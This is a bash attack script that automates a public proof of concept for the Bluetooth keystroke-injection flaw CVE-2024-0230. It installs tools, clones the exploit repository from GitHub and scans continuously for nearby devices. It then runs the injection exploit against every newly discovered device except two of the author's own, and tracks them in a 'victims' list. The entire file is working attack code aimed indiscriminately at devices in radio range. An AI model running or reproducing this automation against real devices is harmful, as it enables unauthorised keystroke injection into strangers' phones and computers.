#!/bin/bash
clear
#set -x
#------------------------------------------------
# Banner for the 1337'ishness
#------------------------------------------------
# Helper around the CVE-2024-0230 Bluetooth keystroke-injection PoC: installs
# the packages it needs, brings the local HCI adapter up, then loops
# `hcitool scan` and runs the cloned PoC against newly discovered devices
# (see SCAN AND EXPLOIT below). Requires root and bash >= 4.
printf '\n%s\n%s\n\n' \
 'HELPER SCRIPT FOR TESTING THE' \
 'BLUETOOTH POC CVE-2024-0230 '
#------------------------------------------------
# Variables
#------------------------------------------------
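# Absolute paths of the external tools the script shells out to. They are
# constants, so mark them readonly; the PRE section verifies each is executable.
readonly RFKILL="/usr/sbin/rfkill"
readonly HCITOOL="/usr/bin/hcitool"
readonly HCICONFIG="/usr/bin/hciconfig"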
#------------------------------------------------
# Arrays
#------------------------------------------------
#------------------------------------------------
# Arrays
#------------------------------------------------
# mac_list:     every MAC a scan returned -> rest of the hcitool line (device name)
# victims_list: MACs the PoC has already been run against (one attempt each)
# exclude_list: MACs that are never handed to the PoC
declare -A mac_list=()
declare -A victims_list=()
#------------------------------------------------
# Exclude list of MAC's NOT to attack
#------------------------------------------------
declare -A exclude_list=(
 ["58:1C:F8:09:9A:F2"]=1 # Illuminati-PC
 ["78:64:C0:1E:FA:42"]=1 # Illuminati-4G
)
#------------------------------------------------
# PRE
#------------------------------------------------
# Only run as user root
# Only run as user root (hciconfig/rfkill/apt-get/systemctl below all need it)
if [[ "${UID}" -ne 0 ]]; then
 printf '\n### ERROR - This script must run as user root (or with sudo)\n\n'
 exit 1
fi
# Ensure script is run with a bash version that supports associative arrays
# (BASH_VERSINFO[0] is the major version)
if (( "${BASH_VERSINFO[0]:-0}" < 4 )); then
 printf '%s\n' "Bash version 4.0 or later is required."
 exit 1
fi
# Install needed utils
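# Install needed utils
#######################################
# Report whether a Debian package is installed (dpkg status line "ii").
# Arguments: $1 - package name
# Returns:   0 if installed, non-zero otherwise
#######################################
pkg_installed() {
 local pkg=$1
 dpkg -l "${pkg}" 2>/dev/null | grep -q "^ii  ${pkg}"
}
for PACKET in python3-bluez python3-pydbus rfkill bluez git; do
 if pkg_installed "${PACKET}"; then
  continue
 fi
 printf "%-50s" "Installing ${PACKET}"
 # Run update and install one after the other: both need the apt/dpkg lock,
 # so starting the install while update is still running in the background
 # could make the install fail even though the package is available.
 apt-get update -qq -y > /dev/null 2>&1
 apt-get install -y -qq "${PACKET}" > /dev/null 2>&1
 if pkg_installed "${PACKET}"; then
  echo "[OK]"
 else
  echo "[FAILED]"
  printf '\nInstallation of %s failed!\n\n' "${PACKET}"
  exit 1
 fi
done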
# Check if utilities exist
# Check if utilities exist (abort on the first one that is not executable)
for UTIL in "${HCITOOL}" "${HCICONFIG}" "${RFKILL}"; do
 [[ -x "${UTIL}" ]] && continue
 printf "\n### ERROR - Could not find ${UTIL}\n\n"
 exit 1
done
#------------------------------------------------
# Download POC scripts
#------------------------------------------------
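# Fetch the PoC repository once; later passes reuse the existing checkout.
if [[ ! -d hi_my_name_is_keyboard ]]; then
 printf "%-50s" "Git-Cloning /marcnewlin/hi_my_name_is_keyboard"
 # Report git's own status instead of printing [OK] unconditionally.
 if git clone -q https://github.com/marcnewlin/hi_my_name_is_keyboard; then
  echo "[OK]"
 else
  echo "[FAILED]"
  exit 1
 fi
fi
# The rest of the script runs from inside the checkout (the PoC is invoked
# as ./keystroke-injection-android-linux.py), so a failed cd must not continue.
cd hi_my_name_is_keyboard || exit 1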
#------------------------------------------------
# TRAP
#------------------------------------------------
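#######################################
# EXIT handler: prints a stop banner, stops the bluetooth service if this
# script was the one that started it, and lists every MAC in mac_list.
# Globals:  STOP_BLUETOOTH (read), mac_list (read)
# Outputs:  summary to stdout
#######################################
on_exit() {
 local mac
 printf -- "\n--------------------------------------------------------------------------------------\n"
 # date output goes through %s rather than being used as the format string
 printf '%s - Attack stopped\n' "$(date)"
 printf -- "--------------------------------------------------------------------------------------\n"
 if [[ "${STOP_BLUETOOTH:-0}" -ne 0 ]]; then
  systemctl stop bluetooth > /dev/null 2>&1
 fi
 if [[ "${#mac_list[@]}" -ne 0 ]]; then
  # NOTE: mac_list holds every device a scan returned, not only the ones in
  # victims_list, so this summary lists discovered rather than attacked devices.
  printf "\nSummary of Attacked Devices:\n"
  printf -- "--------------------------------------------------------------------------------------\n"
  for mac in "${!mac_list[@]}"; do
   printf 'MAC: %s Data: %s\n' "$mac" "${mac_list[$mac]}"
  done
  printf -- "--------------------------------------------------------------------------------------\n"
 fi
}
trap on_exit EXIT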
#------------------------------------------------
# MAIN
#------------------------------------------------
# Start bluetooth service
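# Start bluetooth service if it is not active; remember that we did
# (STOP_BLUETOOTH) so the EXIT trap stops it again on the way out.
if [[ "$(systemctl is-active bluetooth | grep -c '^active')" -eq 0 ]]; then
 printf "%-50s" "Starting bluetooth service"
 STOP_BLUETOOTH=1
 systemctl start bluetooth > /dev/null 2>&1
 if [[ "$(systemctl is-active bluetooth | grep -c '^active')" -eq 0 ]]; then
  echo "[FAILED]"
  exit 1
 fi
 echo "[OK]"
fi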
#------------------------------------------------
# Rfkill Unblock bluetoooth
#------------------------------------------------
# Count "blocked" entries in rfkill's SOFT/HARD columns for the bluetooth type
blocked_count=$("${RFKILL}" --noheadings -o SOFT,HARD list bluetooth | tr ' ' '\n' | grep -v '^$' | grep -c '^blocked')
if [[ "${blocked_count}" -ne 0 ]]; then
 printf "%-50s" "Running \"rfkill unblock bluetooth\""
 "${RFKILL}" unblock bluetooth > /dev/null 2>&1
 echo "[OK]"
fi
sleep 1 # unconditional pause before the HCI device is touched
#------------------------------------------------
# Ensure HCI device is up (on)
#------------------------------------------------
# Bring every hciN adapter listed by hciconfig up; abort if none was found
activated=0
while IFS= read -r HCI; do
 "${HCICONFIG}" "${HCI}" up > /dev/null 2>&1
 activated=$((activated + 1))
done < <("${HCICONFIG}" | grep '^hci' | cut -d ':' -f1 | awk '{print $1}')
if (( activated == 0 )); then
 printf "### An error occoured - HCI device not responding\n\n"
 exit 1
fi
#------------------------------------------------
# FUNCTIONS
#------------------------------------------------
#######################################
# Succeeds (exit 0) when the MAC already has a non-empty entry in mac_list.
# Globals:   mac_list (read)
# Arguments: $1 - MAC address
#######################################
is_this_a_known_mac() {
 [[ -n "${mac_list[$1]}" ]]
}
#------------------------------------------------
# SCAN AND EXPLOIT
#------------------------------------------------
#------------------------------------------------
# SCAN AND EXPLOIT
#------------------------------------------------
# Main loop: never returns on its own -- leave with Ctrl-C, which fires the
# EXIT trap. Each pass runs one `hcitool scan`, records every new MAC in
# mac_list and, if a new one appeared, runs the PoC once per local HCI adapter
# against $mac unless it is in exclude_list or victims_list.
echo ""
printf -- "--------------------------------------------------------------------------------------\n"
printf "$(date) - Starting attack\n" # $(date) doubles as the printf format string here
printf -- "--------------------------------------------------------------------------------------\n"
attacked=0 # PoC invocations so far (counted per HCI adapter, not per device)
printf "%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "0" "0" "0" # status line, no trailing newline
while true; do
 scanning_data=$(${HCITOOL} scan | grep -v ^Scanning) # Perform the scan and filter out the header line
 new_macs_found=0 # entries added to mac_list during this pass
 while IFS= read -r line; do # Process each found MAC address and format it
  # Turns "<MAC><ws><name>" into "<MAC>,<name>". The regex only accepts
  # upper-case hex; a line it does not match passes through unchanged (no
  # comma), so $data ends up empty below and the line is dropped.
  formatted_line=$(echo "$line" | sed -E 's/^[[:space:]]*([0-9A-F:]{17})[[:space:]]*(.*)$/\1,\2/')
  mac=$(echo "$formatted_line" | awk -F, '{print $1}')
  data=$(echo "$formatted_line" | awk -F, '{print $2}')
  if [[ -n "$mac" && -n "$data" ]]; then
   if ! is_this_a_known_mac "$mac"; then 
    mac_list["$mac"]="$data"
    ((new_macs_found++))
    NEW=1 # cleared only when the attack branch below actually runs
   fi
  fi
 done <<< "$scanning_data"
 #------------------------------------------------
 # NOTE: $mac and $data now hold the LAST line of the scan output, which is not
 # necessarily the device that was just added to mac_list. If that $mac is in
 # exclude_list or victims_list, NEW stays 1 and this check repeats next pass.
 if [ ${#mac_list[@]} -ne 0 ] && [ ${NEW:-0} -eq 1 ]; then
  if [ ! -n "${exclude_list[$mac]}" ] && [ ! -n "${victims_list[$mac]}" ] ; then
   NEW=0
   printf "\n%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "${#mac_list[@]}" "${new_macs_found}" "${attacked}"
   #------------------------------------------------
   # Attack
   #------------------------------------------------
   # One PoC run per local adapter, all against the same $mac.
   for HCI in $(${HCICONFIG}|grep ^hci|cut -d ':' -f1|awk '{print $1}'); do 
   printf "\n\n%-50s\n" "Attacking ${mac} | ${data}"
   ((attacked++))
   printf -- "--------------------------------------------------------------------------------------\n"
   timeout 30 ./keystroke-injection-android-linux.py -i ${HCI} -t ${mac} # PoC from the cloned repo (current dir); timeout(1) ends it after 30 s
   victims_list["${mac}"]=1 # Add the target to the victims list so we do not attack them more than 1 time.
   printf "\n"
   printf "%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "${#mac_list[@]}" "0" "${attacked}"
   done
  fi
 fi
done
#------------------------------------------------
# END OF SCRIPT
#------------------------------------------------